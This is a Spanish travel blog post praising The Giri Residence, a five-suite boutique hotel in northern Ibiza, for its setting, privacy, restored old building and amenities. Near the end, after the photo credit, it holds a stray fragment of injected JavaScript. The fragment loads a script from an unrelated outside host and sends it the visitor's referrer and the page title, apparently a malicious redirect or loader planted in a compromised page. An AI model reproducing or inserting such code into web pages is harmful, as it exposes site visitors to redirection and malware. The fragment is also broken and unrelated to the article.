The Giri Residence

22/01/2013

The Sunday Times Travel ha calificado a The Giri Residence como uno de los mejores 100 hoteles del mundo. Por algo será. Muchos son los factores que pueden haber provocado esta clasificación… A continuación tan solo algunos:

  • El entorno. Situado en el corazón de San Juan de Labritja, al norte de Ibiza, el marco que rodea al hotel es incomparable. Todo está cerca y las opciones son diversas: playa, campo, pueblo. Estampas paradisíacas y tradicionales. Uno de esos lugares que obligatoriamente te cautivan.
  • La exclusividad. El hotel cuenta con 5 únicas suites (cada una de ellas decorada de manera especial y diferente). Es evidente que la privacidad prima. Si buscas tranquilidad y discreción aquí la encontrarás.
  • La estructura. El caparazón del hotel es un antiguo caserón de más de 150 años. En su día fue una escuela. Reconstruido en el 2010, es ahora idóneo para albergar a huéspedes de cualquier rincón del mundo.
  • La comodidad. Además del lujo y la exclusividad en The Giri Residence se busca la funcionalidad y el confort. Las suites están diseñadas y decoradas para conseguir tal propósito. Equipadas con detalles infinitos (camas king-size, Wifi, reproductor de DVD, colección de DVD, albornoz, zapatillas… y hasta una esterilla para poder practicar yoga), suelen tener accesos privados al pueblo y/o a otras estancias del hotel.

¿Tendrá razón The Sunday Times Travel al haberlo clasificado en esa lista?

Foto | The Giri Residence en Facebook

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;

ARTÍCULOS RELACIONADOS
COMPARTE ESTE ARTÍCULO